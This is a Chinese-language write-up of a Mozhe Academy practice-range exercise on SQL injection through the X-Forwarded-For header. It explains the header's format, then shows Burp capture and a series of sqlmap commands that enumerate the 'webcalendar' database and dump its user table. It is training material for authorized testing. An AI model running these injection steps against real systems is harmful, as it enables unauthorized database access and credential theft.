靶场练习-墨者学院-sql注入-'X-Forwarded-For' 字段注入

X-Forwarded-For知识点：

X-Forwarded-For 是一个 HTTP 扩展头部。

X-Forwarded-For 请求头格式：X-Forwarded-For: client, proxy1, proxy2

X-Forwarded-For: client, proxy1, proxy2

如果一个 HTTP 请求到达服务器之前，经过了三个代理 Proxy1、Proxy2、Proxy3，IP 分别为 IP1、IP2、IP3，用户真实 IP 为 IP0，那么按照 XFF 标准，服务端最终会收到以下信息：

X-Forwarded-For: IP0, IP1, IP2

题目描述

背景介绍

某业务系统，安全工程师"墨者"进行授权黑盒测试，系统的业主单位也没有给账号密码，怎么测？

实训目标

1、掌握SQL注入的基本原理；
2、了解服务器获取客户端IP的方式；
3、了解SQL注入的工具使用；

解题方向

对登录表单的各参数进行测试，找到SQL注入点，对数据库内容进行读取，找到账号与密码。

解题思路

1.打开靶场环境

 

 2.按题意burp抓包测试X-Forwarded-For字段，可能存在注入点

 

 

 

 3.将请求头放到txt，sqlmap测试

python2 sqlmap.py -r 1.txt --dbs --batch

 

 

 

python2 sqlmap.py -r 1.txt -D webcalendar --tables --batch

 

 

 python2 sqlmap.py -r 1.txt -D webcalendar -T user --columns --batch

 

 python2 sqlmap.py -r 1.txt -D webcalendar -T user -C username --dump --batch

 

 python2 sqlmap.py -r 1.txt -D webcalendar -T user -C username --dump --batch